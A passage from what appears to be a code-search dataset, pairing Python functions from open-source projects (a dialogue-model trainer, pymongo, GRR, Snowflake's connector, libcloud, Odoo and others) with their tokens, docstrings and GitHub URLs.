lr_scheduler=lr_scheduler, save_summary=False)
if config.ckpt is not None:
trainer.load(file_prefix=config.ckpt)
trainer.train()
logger.info("Training done!")
# Test
logger.info("")
trainer.load(os.path.join(config.save_dir, "best"))
logger.info("Testing starts ...")
metrics, scores = evaluate(model, test_iter)
logger.info(metrics.report_cum())
logger.info("Generation starts ...")
test_gen_file = os.path.join(config.save_dir, "test.result")
evaluate_generation(generator, test_iter, save_file=test_gen_file, verbos=True)
|
[
"def",
"main",
"(",
")",
":",
"config",
"=",
"model_config",
"(",
")",
"if",
"config",
".",
"check",
":",
"config",
".",
"save_dir",
"=",
"\"./tmp/\"",
"config",
".",
"use_gpu",
"=",
"torch",
".",
"cuda",
".",
"is_available",
"(",
")",
"and",
"config",
".",
"gpu",
">=",
"0",
"device",
"=",
"config",
".",
"gpu",
"torch",
".",
"cuda",
".",
"set_device",
"(",
"device",
")",
"# Data definition",
"corpus",
"=",
"KnowledgeCorpus",
"(",
"data_dir",
"=",
"config",
".",
"data_dir",
",",
"data_prefix",
"=",
"config",
".",
"data_prefix",
",",
"min_freq",
"=",
"0",
",",
"max_vocab_size",
"=",
"config",
".",
"max_vocab_size",
",",
"min_len",
"=",
"config",
".",
"min_len",
",",
"max_len",
"=",
"config",
".",
"max_len",
",",
"embed_file",
"=",
"config",
".",
"embed_file",
",",
"with_label",
"=",
"config",
".",
"with_label",
",",
"share_vocab",
"=",
"config",
".",
"share_vocab",
")",
"corpus",
".",
"load",
"(",
")",
"if",
"config",
".",
"test",
"and",
"config",
".",
"ckpt",
":",
"corpus",
".",
"reload",
"(",
"data_type",
"=",
"'test'",
")",
"train_iter",
"=",
"corpus",
".",
"create_batches",
"(",
"config",
".",
"batch_size",
",",
"\"train\"",
",",
"shuffle",
"=",
"True",
",",
"device",
"=",
"device",
")",
"valid_iter",
"=",
"corpus",
".",
"create_batches",
"(",
"config",
".",
"batch_size",
",",
"\"valid\"",
",",
"shuffle",
"=",
"False",
",",
"device",
"=",
"device",
")",
"test_iter",
"=",
"corpus",
".",
"create_batches",
"(",
"config",
".",
"batch_size",
",",
"\"test\"",
",",
"shuffle",
"=",
"False",
",",
"device",
"=",
"device",
")",
"# Model definition",
"model",
"=",
"KnowledgeSeq2Seq",
"(",
"src_vocab_size",
"=",
"corpus",
".",
"SRC",
".",
"vocab_size",
",",
"tgt_vocab_size",
"=",
"corpus",
".",
"TGT",
".",
"vocab_size",
",",
"embed_size",
"=",
"config",
".",
"embed_size",
",",
"hidden_size",
"=",
"config",
".",
"hidden_size",
",",
"padding_idx",
"=",
"corpus",
".",
"padding_idx",
",",
"num_layers",
"=",
"config",
".",
"num_layers",
",",
"bidirectional",
"=",
"config",
".",
"bidirectional",
",",
"attn_mode",
"=",
"config",
".",
"attn",
",",
"with_bridge",
"=",
"config",
".",
"with_bridge",
",",
"tie_embedding",
"=",
"config",
".",
"tie_embedding",
",",
"dropout",
"=",
"config",
".",
"dropout",
",",
"use_gpu",
"=",
"config",
".",
"use_gpu",
",",
"use_bow",
"=",
"config",
".",
"use_bow",
",",
"use_dssm",
"=",
"config",
".",
"use_dssm",
",",
"use_pg",
"=",
"config",
".",
"use_pg",
",",
"use_gs",
"=",
"config",
".",
"use_gs",
",",
"pretrain_epoch",
"=",
"config",
".",
"pretrain_epoch",
",",
"use_posterior",
"=",
"config",
".",
"use_posterior",
",",
"weight_control",
"=",
"config",
".",
"weight_control",
",",
"concat",
"=",
"config",
".",
"decode_concat",
")",
"model_name",
"=",
"model",
".",
"__class__",
".",
"__name__",
"# Generator definition",
"generator",
"=",
"TopKGenerator",
"(",
"model",
"=",
"model",
",",
"src_field",
"=",
"corpus",
".",
"SRC",
",",
"tgt_field",
"=",
"corpus",
".",
"TGT",
",",
"cue_field",
"=",
"corpus",
".",
"CUE",
",",
"max_length",
"=",
"config",
".",
"max_dec_len",
",",
"ignore_unk",
"=",
"config",
".",
"ignore_unk",
",",
"length_average",
"=",
"config",
".",
"length_average",
",",
"use_gpu",
"=",
"config",
".",
"use_gpu",
")",
"# Interactive generation testing",
"if",
"config",
".",
"interact",
"and",
"config",
".",
"ckpt",
":",
"model",
".",
"load",
"(",
"config",
".",
"ckpt",
")",
"return",
"generator",
"# Testing",
"elif",
"config",
".",
"test",
"and",
"config",
".",
"ckpt",
":",
"print",
"(",
"model",
")",
"model",
".",
"load",
"(",
"config",
".",
"ckpt",
")",
"print",
"(",
"\"Testing ...\"",
")",
"metrics",
",",
"scores",
"=",
"evaluate",
"(",
"model",
",",
"test_iter",
")",
"print",
"(",
"metrics",
".",
"report_cum",
"(",
")",
")",
"print",
"(",
"\"Generating ...\"",
")",
"evaluate_generation",
"(",
"generator",
",",
"test_iter",
",",
"save_file",
"=",
"config",
".",
"gen_file",
",",
"verbos",
"=",
"True",
")",
"else",
":",
"# Load word embeddings",
"if",
"config",
".",
"use_embed",
"and",
"config",
".",
"embed_file",
"is",
"not",
"None",
":",
"model",
".",
"encoder",
".",
"embedder",
".",
"load_embeddings",
"(",
"corpus",
".",
"SRC",
".",
"embeddings",
",",
"scale",
"=",
"0.03",
")",
"model",
".",
"decoder",
".",
"embedder",
".",
"load_embeddings",
"(",
"corpus",
".",
"TGT",
".",
"embeddings",
",",
"scale",
"=",
"0.03",
")",
"# Optimizer definition",
"optimizer",
"=",
"getattr",
"(",
"torch",
".",
"optim",
",",
"config",
".",
"optimizer",
")",
"(",
"model",
".",
"parameters",
"(",
")",
",",
"lr",
"=",
"config",
".",
"lr",
")",
"# Learning rate scheduler",
"if",
"config",
".",
"lr_decay",
"is",
"not",
"None",
"and",
"0",
"<",
"config",
".",
"lr_decay",
"<",
"1.0",
":",
"lr_scheduler",
"=",
"torch",
".",
"optim",
".",
"lr_scheduler",
".",
"ReduceLROnPlateau",
"(",
"optimizer",
"=",
"optimizer",
",",
"factor",
"=",
"config",
".",
"lr_decay",
",",
"patience",
"=",
"1",
",",
"verbose",
"=",
"True",
",",
"min_lr",
"=",
"1e-5",
")",
"else",
":",
"lr_scheduler",
"=",
"None",
"# Save directory",
"date_str",
",",
"time_str",
"=",
"datetime",
".",
"now",
"(",
")",
".",
"strftime",
"(",
"\"%Y%m%d-%H%M%S\"",
")",
".",
"split",
"(",
"\"-\"",
")",
"result_str",
"=",
"\"{}-{}\"",
".",
"format",
"(",
"model_name",
",",
"time_str",
")",
"if",
"not",
"os",
".",
"path",
".",
"exists",
"(",
"config",
".",
"save_dir",
")",
":",
"os",
".",
"makedirs",
"(",
"config",
".",
"save_dir",
")",
"# Logger definition",
"logger",
"=",
"logging",
".",
"getLogger",
"(",
"__name__",
")",
"logging",
".",
"basicConfig",
"(",
"level",
"=",
"logging",
".",
"DEBUG",
",",
"format",
"=",
"\"%(message)s\"",
")",
"fh",
"=",
"logging",
".",
"FileHandler",
"(",
"os",
".",
"path",
".",
"join",
"(",
"config",
".",
"save_dir",
",",
"\"train.log\"",
")",
")",
"logger",
".",
"addHandler",
"(",
"fh",
")",
"# Save config",
"params_file",
"=",
"os",
".",
"path",
".",
"join",
"(",
"config",
".",
"save_dir",
",",
"\"params.json\"",
")",
"with",
"open",
"(",
"params_file",
",",
"'w'",
")",
"as",
"fp",
":",
"json",
".",
"dump",
"(",
"config",
".",
"__dict__",
",",
"fp",
",",
"indent",
"=",
"4",
",",
"sort_keys",
"=",
"True",
")",
"print",
"(",
"\"Saved params to '{}'\"",
".",
"format",
"(",
"params_file",
")",
")",
"logger",
".",
"info",
"(",
"model",
")",
"# Train",
"logger",
".",
"info",
"(",
"\"Training starts ...\"",
")",
"trainer",
"=",
"Trainer",
"(",
"model",
"=",
"model",
",",
"optimizer",
"=",
"optimizer",
",",
"train_iter",
"=",
"train_iter",
",",
"valid_iter",
"=",
"valid_iter",
",",
"logger",
"=",
"logger",
",",
"generator",
"=",
"generator",
",",
"valid_metric_name",
"=",
"\"-loss\"",
",",
"num_epochs",
"=",
"config",
".",
"num_epochs",
",",
"save_dir",
"=",
"config",
".",
"save_dir",
",",
"log_steps",
"=",
"config",
".",
"log_steps",
",",
"valid_steps",
"=",
"config",
".",
"valid_steps",
",",
"grad_clip",
"=",
"config",
".",
"grad_clip",
",",
"lr_scheduler",
"=",
"lr_scheduler",
",",
"save_summary",
"=",
"False",
")",
"if",
"config",
".",
"ckpt",
"is",
"not",
"None",
":",
"trainer",
".",
"load",
"(",
"file_prefix",
"=",
"config",
".",
"ckpt",
")",
"trainer",
".",
"train",
"(",
")",
"logger",
".",
"info",
"(",
"\"Training done!\"",
")",
"# Test",
"logger",
".",
"info",
"(",
"\"\"",
")",
"trainer",
".",
"load",
"(",
"os",
".",
"path",
".",
"join",
"(",
"config",
".",
"save_dir",
",",
"\"best\"",
")",
")",
"logger",
".",
"info",
"(",
"\"Testing starts ...\"",
")",
"metrics",
",",
"scores",
"=",
"evaluate",
"(",
"model",
",",
"test_iter",
")",
"logger",
".",
"info",
"(",
"metrics",
".",
"report_cum",
"(",
")",
")",
"logger",
".",
"info",
"(",
"\"Generation starts ...\"",
")",
"test_gen_file",
"=",
"os",
".",
"path",
".",
"join",
"(",
"config",
".",
"save_dir",
",",
"\"test.result\"",
")",
"evaluate_generation",
"(",
"generator",
",",
"test_iter",
",",
"save_file",
"=",
"test_gen_file",
",",
"verbos",
"=",
"True",
")"
] |
https://github.com/baidu/knowledge-driven-dialogue/blob/ba85518a1ac2a57988188fc5f2b8fe42e1facf64/generative_pt/network.py#L104-L215
|
||
ShuaiW/teach-machine-to-trade
|
19dfc2c6537e61ac6eb0102caeb5ed6d32454f99
|
model.py
|
python
|
mlp
|
(n_obs, n_action, n_hidden_layer=1, n_neuron_per_layer=32,
activation='relu', loss='mse')
|
return model
|
A multi-layer perceptron
|
A multi-layer perceptron
|
[
"A",
"multi",
"-",
"layer",
"perceptron"
] |
def mlp(n_obs, n_action, n_hidden_layer=1, n_neuron_per_layer=32,
activation='relu', loss='mse'):
""" A multi-layer perceptron """
model = Sequential()
model.add(Dense(n_neuron_per_layer, input_dim=n_obs, activation=activation))
for _ in range(n_hidden_layer):
model.add(Dense(n_neuron_per_layer, activation=activation))
model.add(Dense(n_action, activation='linear'))
model.compile(loss=loss, optimizer=Adam())
print(model.summary())
return model
|
[
"def",
"mlp",
"(",
"n_obs",
",",
"n_action",
",",
"n_hidden_layer",
"=",
"1",
",",
"n_neuron_per_layer",
"=",
"32",
",",
"activation",
"=",
"'relu'",
",",
"loss",
"=",
"'mse'",
")",
":",
"model",
"=",
"Sequential",
"(",
")",
"model",
".",
"add",
"(",
"Dense",
"(",
"n_neuron_per_layer",
",",
"input_dim",
"=",
"n_obs",
",",
"activation",
"=",
"activation",
")",
")",
"for",
"_",
"in",
"range",
"(",
"n_hidden_layer",
")",
":",
"model",
".",
"add",
"(",
"Dense",
"(",
"n_neuron_per_layer",
",",
"activation",
"=",
"activation",
")",
")",
"model",
".",
"add",
"(",
"Dense",
"(",
"n_action",
",",
"activation",
"=",
"'linear'",
")",
")",
"model",
".",
"compile",
"(",
"loss",
"=",
"loss",
",",
"optimizer",
"=",
"Adam",
"(",
")",
")",
"print",
"(",
"model",
".",
"summary",
"(",
")",
")",
"return",
"model"
] |
https://github.com/ShuaiW/teach-machine-to-trade/blob/19dfc2c6537e61ac6eb0102caeb5ed6d32454f99/model.py#L7-L17
|
|
rembo10/headphones
|
b3199605be1ebc83a7a8feab6b1e99b64014187c
|
lib/html5lib/inputstream.py
|
python
|
EncodingBytes.__next__
|
(self)
|
return self[p:p + 1]
|
[] |
def __next__(self):
p = self._position = self._position + 1
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
return self[p:p + 1]
|
[
"def",
"__next__",
"(",
"self",
")",
":",
"p",
"=",
"self",
".",
"_position",
"=",
"self",
".",
"_position",
"+",
"1",
"if",
"p",
">=",
"len",
"(",
"self",
")",
":",
"raise",
"StopIteration",
"elif",
"p",
"<",
"0",
":",
"raise",
"TypeError",
"return",
"self",
"[",
"p",
":",
"p",
"+",
"1",
"]"
] |
https://github.com/rembo10/headphones/blob/b3199605be1ebc83a7a8feab6b1e99b64014187c/lib/html5lib/inputstream.py#L582-L588
|
|||
Georce/lepus
|
5b01bae82b5dc1df00c9e058989e2eb9b89ff333
|
lepus/pymongo-2.7/pymongo/mongo_replica_set_client.py
|
python
|
MongoReplicaSetClient.use_greenlets
|
(self)
|
return self.__use_greenlets
|
Whether calling :meth:`start_request` assigns greenlet-local,
rather than thread-local, sockets.
.. versionadded:: 2.4.2
|
Whether calling :meth:`start_request` assigns greenlet-local,
rather than thread-local, sockets.
|
[
"Whether",
"calling",
":",
"meth",
":",
"start_request",
"assigns",
"greenlet",
"-",
"local",
"rather",
"than",
"thread",
"-",
"local",
"sockets",
"."
] |
def use_greenlets(self):
"""Whether calling :meth:`start_request` assigns greenlet-local,
rather than thread-local, sockets.
.. versionadded:: 2.4.2
"""
return self.__use_greenlets
|
[
"def",
"use_greenlets",
"(",
"self",
")",
":",
"return",
"self",
".",
"__use_greenlets"
] |
https://github.com/Georce/lepus/blob/5b01bae82b5dc1df00c9e058989e2eb9b89ff333/lepus/pymongo-2.7/pymongo/mongo_replica_set_client.py#L914-L920
|
|
google/grr
|
8ad8a4d2c5a93c92729206b7771af19d92d4f915
|
grr/server/grr_response_server/flows/general/filesystem.py
|
python
|
ListDirectory.NotifyAboutEnd
|
(self)
|
Sends a notification that this flow is done.
|
Sends a notification that this flow is done.
|
[
"Sends",
"a",
"notification",
"that",
"this",
"flow",
"is",
"done",
"."
] |
def NotifyAboutEnd(self):
"""Sends a notification that this flow is done."""
if not self.state.urn:
super().NotifyAboutEnd()
return
st = self.state.stat
ps_path_type = st.pathspec.last.pathtype
path_type = rdf_objects.PathInfo.PathTypeFromPathspecPathType(ps_path_type)
full_path = st.pathspec.CollapsePath()
path_components = full_path.strip("/").split("/")
file_ref = rdf_objects.VfsFileReference(
client_id=self.client_id,
path_type=path_type,
path_components=path_components)
notification.Notify(
self.creator,
rdf_objects.UserNotification.Type.TYPE_VFS_LIST_DIRECTORY_COMPLETED,
"Listed {0}".format(full_path),
rdf_objects.ObjectReference(
reference_type=rdf_objects.ObjectReference.Type.VFS_FILE,
vfs_file=file_ref))
|
[
"def",
"NotifyAboutEnd",
"(",
"self",
")",
":",
"if",
"not",
"self",
".",
"state",
".",
"urn",
":",
"super",
"(",
")",
".",
"NotifyAboutEnd",
"(",
")",
"return",
"st",
"=",
"self",
".",
"state",
".",
"stat",
"ps_path_type",
"=",
"st",
".",
"pathspec",
".",
"last",
".",
"pathtype",
"path_type",
"=",
"rdf_objects",
".",
"PathInfo",
".",
"PathTypeFromPathspecPathType",
"(",
"ps_path_type",
")",
"full_path",
"=",
"st",
".",
"pathspec",
".",
"CollapsePath",
"(",
")",
"path_components",
"=",
"full_path",
".",
"strip",
"(",
"\"/\"",
")",
".",
"split",
"(",
"\"/\"",
")",
"file_ref",
"=",
"rdf_objects",
".",
"VfsFileReference",
"(",
"client_id",
"=",
"self",
".",
"client_id",
",",
"path_type",
"=",
"path_type",
",",
"path_components",
"=",
"path_components",
")",
"notification",
".",
"Notify",
"(",
"self",
".",
"creator",
",",
"rdf_objects",
".",
"UserNotification",
".",
"Type",
".",
"TYPE_VFS_LIST_DIRECTORY_COMPLETED",
",",
"\"Listed {0}\"",
".",
"format",
"(",
"full_path",
")",
",",
"rdf_objects",
".",
"ObjectReference",
"(",
"reference_type",
"=",
"rdf_objects",
".",
"ObjectReference",
".",
"Type",
".",
"VFS_FILE",
",",
"vfs_file",
"=",
"file_ref",
")",
")"
] |
https://github.com/google/grr/blob/8ad8a4d2c5a93c92729206b7771af19d92d4f915/grr/server/grr_response_server/flows/general/filesystem.py#L161-L186
|
||
LabPy/lantz
|
3e878e3f765a4295b0089d04e241d4beb7b8a65b
|
lantz/drivers/legacy/andor/ccd.py
|
python
|
CCD.n_horiz_shift_speeds
|
(self, channel=0, typ=None)
|
return n.value
|
As your Andor SDK system is capable of operating at more than one
horizontal shift speed this function will return the actual number of
speeds available.
Parameters
int channel: the AD channel.
int typ: output amplification.
Valid values: 0 electron multiplication.
1 conventional.
int* speeds: number of allowed horizontal speeds
|
As your Andor SDK system is capable of operating at more than one
horizontal shift speed this function will return the actual number of
speeds available.
Parameters
int channel: the AD channel.
int typ: output amplification.
Valid values: 0 electron multiplication.
1 conventional.
int* speeds: number of allowed horizontal speeds
|
[
"As",
"your",
"Andor",
"SDK",
"system",
"is",
"capable",
"of",
"operating",
"at",
"more",
"than",
"one",
"horizontal",
"shift",
"speed",
"this",
"function",
"will",
"return",
"the",
"actual",
"number",
"of",
"speeds",
"available",
".",
"Parameters",
"int",
"channel",
":",
"the",
"AD",
"channel",
".",
"int",
"typ",
":",
"output",
"amplification",
".",
"Valid",
"values",
":",
"0",
"electron",
"multiplication",
".",
"1",
"conventional",
".",
"int",
"*",
"speeds",
":",
"number",
"of",
"allowed",
"horizontal",
"speeds"
] |
def n_horiz_shift_speeds(self, channel=0, typ=None):
""" As your Andor SDK system is capable of operating at more than one
horizontal shift speed this function will return the actual number of
speeds available.
Parameters
int channel: the AD channel.
int typ: output amplification.
Valid values: 0 electron multiplication.
1 conventional.
int* speeds: number of allowed horizontal speeds
"""
if typ is None:
typ = self.amp_typ
n = ct.c_int()
self.lib.GetNumberHSSpeeds(ct.c_int(channel),
ct.c_int(typ), ct.pointer(n))
return n.value
|
[
"def",
"n_horiz_shift_speeds",
"(",
"self",
",",
"channel",
"=",
"0",
",",
"typ",
"=",
"None",
")",
":",
"if",
"typ",
"is",
"None",
":",
"typ",
"=",
"self",
".",
"amp_typ",
"n",
"=",
"ct",
".",
"c_int",
"(",
")",
"self",
".",
"lib",
".",
"GetNumberHSSpeeds",
"(",
"ct",
".",
"c_int",
"(",
"channel",
")",
",",
"ct",
".",
"c_int",
"(",
"typ",
")",
",",
"ct",
".",
"pointer",
"(",
"n",
")",
")",
"return",
"n",
".",
"value"
] |
https://github.com/LabPy/lantz/blob/3e878e3f765a4295b0089d04e241d4beb7b8a65b/lantz/drivers/legacy/andor/ccd.py#L1465-L1484
|
|
mnot/nbhttp
|
80389f168f3bb3f0dbc7f6aee648e3286eed0a7a
|
src/server.py
|
python
|
test_handler
|
(method, uri, hdrs, res_start, req_pause)
|
return dummy, dummy
|
An extremely simple (and limited) server request_handler.
|
An extremely simple (and limited) server request_handler.
|
[
"An",
"extremely",
"simple",
"(",
"and",
"limited",
")",
"server",
"request_handler",
"."
] |
def test_handler(method, uri, hdrs, res_start, req_pause):
"""
An extremely simple (and limited) server request_handler.
"""
code = "200"
phrase = "OK"
res_hdrs = [('Content-Type', 'text/plain')]
res_body, res_done = res_start(code, phrase, res_hdrs, dummy)
res_body('foo!')
res_done(None)
return dummy, dummy
|
[
"def",
"test_handler",
"(",
"method",
",",
"uri",
",",
"hdrs",
",",
"res_start",
",",
"req_pause",
")",
":",
"code",
"=",
"\"200\"",
"phrase",
"=",
"\"OK\"",
"res_hdrs",
"=",
"[",
"(",
"'Content-Type'",
",",
"'text/plain'",
")",
"]",
"res_body",
",",
"res_done",
"=",
"res_start",
"(",
"code",
",",
"phrase",
",",
"res_hdrs",
",",
"dummy",
")",
"res_body",
"(",
"'foo!'",
")",
"res_done",
"(",
"None",
")",
"return",
"dummy",
",",
"dummy"
] |
https://github.com/mnot/nbhttp/blob/80389f168f3bb3f0dbc7f6aee648e3286eed0a7a/src/server.py#L283-L293
|
|
snarfed/granary
|
ab085de2aef0cff8ac31a99b5e21443a249e8419
|
granary/facebook.py
|
python
|
Facebook._find_all_text
|
(soup, regexp)
|
return soup.find_all(lambda tag: any(regexp.match(c.string.strip())
for c in tag.contents if c.string))
|
BeautifulSoup utility that searches for text and returns a Tag.
I'd rather just use soup.find(string=...), but it returns a NavigableString
instead of a Tag, and I need a Tag so I can look at the elements inside it.
https://www.crummy.com/software/BeautifulSoup/bs4/doc/#the-string-argument
Args:
soup: BeautifulSoup
regexp: string, must match target's text after stripping whitespace
|
BeautifulSoup utility that searches for text and returns a Tag.
|
[
"BeautifulSoup",
"utility",
"that",
"searches",
"for",
"text",
"and",
"returns",
"a",
"Tag",
"."
] |
def _find_all_text(soup, regexp):
"""BeautifulSoup utility that searches for text and returns a Tag.
I'd rather just use soup.find(string=...), but it returns a NavigableString
instead of a Tag, and I need a Tag so I can look at the elements inside it.
https://www.crummy.com/software/BeautifulSoup/bs4/doc/#the-string-argument
Args:
soup: BeautifulSoup
regexp: string, must match target's text after stripping whitespace
"""
regexp = re.compile(regexp)
return soup.find_all(lambda tag: any(regexp.match(c.string.strip())
for c in tag.contents if c.string))
|
[
"def",
"_find_all_text",
"(",
"soup",
",",
"regexp",
")",
":",
"regexp",
"=",
"re",
".",
"compile",
"(",
"regexp",
")",
"return",
"soup",
".",
"find_all",
"(",
"lambda",
"tag",
":",
"any",
"(",
"regexp",
".",
"match",
"(",
"c",
".",
"string",
".",
"strip",
"(",
")",
")",
"for",
"c",
"in",
"tag",
".",
"contents",
"if",
"c",
".",
"string",
")",
")"
] |
https://github.com/snarfed/granary/blob/ab085de2aef0cff8ac31a99b5e21443a249e8419/granary/facebook.py#L1697-L1710
|
|
snowflakedb/snowflake-connector-python
|
1659ec6b78930d1f947b4eff985c891af614d86c
|
src/snowflake/connector/auth_webbrowser.py
|
python
|
AuthByWebBrowser._process_options
|
(self, data, socket_client)
|
return True
|
Allows JS Ajax access to this endpoint.
|
Allows JS Ajax access to this endpoint.
|
[
"Allows",
"JS",
"Ajax",
"access",
"to",
"this",
"endpoint",
"."
] |
def _process_options(self, data, socket_client):
"""Allows JS Ajax access to this endpoint."""
for line in data:
if line.startswith("OPTIONS "):
break
else:
return False
self._get_user_agent(data)
requested_headers, requested_origin = self._check_post_requested(data)
if not requested_headers:
return False
if not self._validate_origin(requested_origin):
# validate Origin and fail if not match with the server.
return False
self._origin = requested_origin
content = [
"HTTP/1.1 200 OK",
"Date: {}".format(
time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime())
),
"Access-Control-Allow-Methods: POST, GET",
"Access-Control-Allow-Headers: {}".format(requested_headers),
"Access-Control-Max-Age: 86400",
"Access-Control-Allow-Origin: {}".format(self._origin),
"",
"",
]
socket_client.sendall("\r\n".join(content).encode("utf-8"))
return True
|
[
"def",
"_process_options",
"(",
"self",
",",
"data",
",",
"socket_client",
")",
":",
"for",
"line",
"in",
"data",
":",
"if",
"line",
".",
"startswith",
"(",
"\"OPTIONS \"",
")",
":",
"break",
"else",
":",
"return",
"False",
"self",
".",
"_get_user_agent",
"(",
"data",
")",
"requested_headers",
",",
"requested_origin",
"=",
"self",
".",
"_check_post_requested",
"(",
"data",
")",
"if",
"not",
"requested_headers",
":",
"return",
"False",
"if",
"not",
"self",
".",
"_validate_origin",
"(",
"requested_origin",
")",
":",
"# validate Origin and fail if not match with the server.",
"return",
"False",
"self",
".",
"_origin",
"=",
"requested_origin",
"content",
"=",
"[",
"\"HTTP/1.1 200 OK\"",
",",
"\"Date: {}\"",
".",
"format",
"(",
"time",
".",
"strftime",
"(",
"\"%a, %d %b %Y %H:%M:%S GMT\"",
",",
"time",
".",
"gmtime",
"(",
")",
")",
")",
",",
"\"Access-Control-Allow-Methods: POST, GET\"",
",",
"\"Access-Control-Allow-Headers: {}\"",
".",
"format",
"(",
"requested_headers",
")",
",",
"\"Access-Control-Max-Age: 86400\"",
",",
"\"Access-Control-Allow-Origin: {}\"",
".",
"format",
"(",
"self",
".",
"_origin",
")",
",",
"\"\"",
",",
"\"\"",
",",
"]",
"socket_client",
".",
"sendall",
"(",
"\"\\r\\n\"",
".",
"join",
"(",
"content",
")",
".",
"encode",
"(",
"\"utf-8\"",
")",
")",
"return",
"True"
] |
https://github.com/snowflakedb/snowflake-connector-python/blob/1659ec6b78930d1f947b4eff985c891af614d86c/src/snowflake/connector/auth_webbrowser.py#L167-L198
|
|
pyinvoke/invoke
|
45dc9d03639dac5b6d1445831bf270e686ef88b4
|
invoke/watchers.py
|
python
|
Responder.pattern_matches
|
(self, stream, pattern, index_attr)
|
return matches
|
Generic "search for pattern in stream, using index" behavior.
Used here and in some subclasses that want to track multiple patterns
concurrently.
:param unicode stream: The same data passed to ``submit``.
:param unicode pattern: The pattern to search for.
:param unicode index_attr: The name of the index attribute to use.
:returns: An iterable of string matches.
.. versionadded:: 1.0
|
Generic "search for pattern in stream, using index" behavior.
|
[
"Generic",
"search",
"for",
"pattern",
"in",
"stream",
"using",
"index",
"behavior",
"."
] |
def pattern_matches(self, stream, pattern, index_attr):
"""
Generic "search for pattern in stream, using index" behavior.
Used here and in some subclasses that want to track multiple patterns
concurrently.
:param unicode stream: The same data passed to ``submit``.
:param unicode pattern: The pattern to search for.
:param unicode index_attr: The name of the index attribute to use.
:returns: An iterable of string matches.
.. versionadded:: 1.0
"""
# NOTE: generifies scanning so it can be used to scan for >1 pattern at
# once, e.g. in FailingResponder.
# Only look at stream contents we haven't seen yet, to avoid dupes.
index = getattr(self, index_attr)
new_ = stream[index:]
# Search, across lines if necessary
matches = re.findall(pattern, new_, re.S)
# Update seek index if we've matched
if matches:
setattr(self, index_attr, index + len(new_))
return matches
|
[
"def",
"pattern_matches",
"(",
"self",
",",
"stream",
",",
"pattern",
",",
"index_attr",
")",
":",
"# NOTE: generifies scanning so it can be used to scan for >1 pattern at",
"# once, e.g. in FailingResponder.",
"# Only look at stream contents we haven't seen yet, to avoid dupes.",
"index",
"=",
"getattr",
"(",
"self",
",",
"index_attr",
")",
"new_",
"=",
"stream",
"[",
"index",
":",
"]",
"# Search, across lines if necessary",
"matches",
"=",
"re",
".",
"findall",
"(",
"pattern",
",",
"new_",
",",
"re",
".",
"S",
")",
"# Update seek index if we've matched",
"if",
"matches",
":",
"setattr",
"(",
"self",
",",
"index_attr",
",",
"index",
"+",
"len",
"(",
"new_",
")",
")",
"return",
"matches"
] |
https://github.com/pyinvoke/invoke/blob/45dc9d03639dac5b6d1445831bf270e686ef88b4/invoke/watchers.py#L78-L102
|
|
apache/libcloud
|
90971e17bfd7b6bb97b2489986472c531cc8e140
|
libcloud/compute/drivers/vultr.py
|
python
|
VultrNodeDriverV2.list_volumes
|
(self)
|
return [self._to_volume(item) for item in data]
|
List storage volumes.
:rtype: ``list`` of :class:`StorageVolume`
|
List storage volumes.
|
[
"List",
"storage",
"volumes",
"."
] |
def list_volumes(self) -> List[StorageVolume]:
"""List storage volumes.
:rtype: ``list`` of :class:`StorageVolume`
"""
data = self._paginated_request("/v2/blocks", "blocks")
return [self._to_volume(item) for item in data]
|
[
"def",
"list_volumes",
"(",
"self",
")",
"->",
"List",
"[",
"StorageVolume",
"]",
":",
"data",
"=",
"self",
".",
"_paginated_request",
"(",
"\"/v2/blocks\"",
",",
"\"blocks\"",
")",
"return",
"[",
"self",
".",
"_to_volume",
"(",
"item",
")",
"for",
"item",
"in",
"data",
"]"
] |
https://github.com/apache/libcloud/blob/90971e17bfd7b6bb97b2489986472c531cc8e140/libcloud/compute/drivers/vultr.py#L1400-L1406
|
|
openshift/openshift-tools
|
1188778e728a6e4781acf728123e5b356380fe6f
|
openshift_tools/monitoring/metric_sender.py
|
python
|
MetricSender.add_dynamic_metric
|
(self, discovery_key, macro_string, macro_array, host=None, synthetic=False)
|
apply add_dynamic_metric for each sender
|
apply add_dynamic_metric for each sender
|
[
"apply",
"add_dynamic_metric",
"for",
"each",
"sender"
] |
def add_dynamic_metric(self, discovery_key, macro_string, macro_array, host=None, synthetic=False):
''' apply add_dynamic_metric for each sender'''
for sender in self.active_senders:
sender.add_dynamic_metric(discovery_key, macro_string, macro_array, host, synthetic)
|
[
"def",
"add_dynamic_metric",
"(",
"self",
",",
"discovery_key",
",",
"macro_string",
",",
"macro_array",
",",
"host",
"=",
"None",
",",
"synthetic",
"=",
"False",
")",
":",
"for",
"sender",
"in",
"self",
".",
"active_senders",
":",
"sender",
".",
"add_dynamic_metric",
"(",
"discovery_key",
",",
"macro_string",
",",
"macro_array",
",",
"host",
",",
"synthetic",
")"
] |
https://github.com/openshift/openshift-tools/blob/1188778e728a6e4781acf728123e5b356380fe6f/openshift_tools/monitoring/metric_sender.py#L75-L78
|
||
mesalock-linux/mesapy
|
ed546d59a21b36feb93e2309d5c6b75aa0ad95c9
|
lib-python/2.7/decimal.py
|
python
|
Decimal.__float__
|
(self)
|
return float(s)
|
Float representation.
|
Float representation.
|
[
"Float",
"representation",
"."
] |
def __float__(self):
"""Float representation."""
if self._isnan():
if self.is_snan():
raise ValueError("Cannot convert signaling NaN to float")
s = "-nan" if self._sign else "nan"
else:
s = str(self)
return float(s)
|
[
"def",
"__float__",
"(",
"self",
")",
":",
"if",
"self",
".",
"_isnan",
"(",
")",
":",
"if",
"self",
".",
"is_snan",
"(",
")",
":",
"raise",
"ValueError",
"(",
"\"Cannot convert signaling NaN to float\"",
")",
"s",
"=",
"\"-nan\"",
"if",
"self",
".",
"_sign",
"else",
"\"nan\"",
"else",
":",
"s",
"=",
"str",
"(",
"self",
")",
"return",
"float",
"(",
"s",
")"
] |
https://github.com/mesalock-linux/mesapy/blob/ed546d59a21b36feb93e2309d5c6b75aa0ad95c9/lib-python/2.7/decimal.py#L1580-L1588
|
|
buke/GreenOdoo
|
3d8c55d426fb41fdb3f2f5a1533cfe05983ba1df
|
source/addons/resource/resource.py
|
python
|
resource_calendar._interval_hours_get
|
(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None)
|
return self.get_working_hours(
cr, uid, id, dt_from, dt_to,
compute_leaves=(not exclude_leaves), resource_id=resource_id,
default_interval=(8, 16), context=context)
|
Computes working hours between two dates, taking always same hour/minuts.
:deprecated: OpenERP saas-3. Use get_working_hours instead. Note: since saas-3,
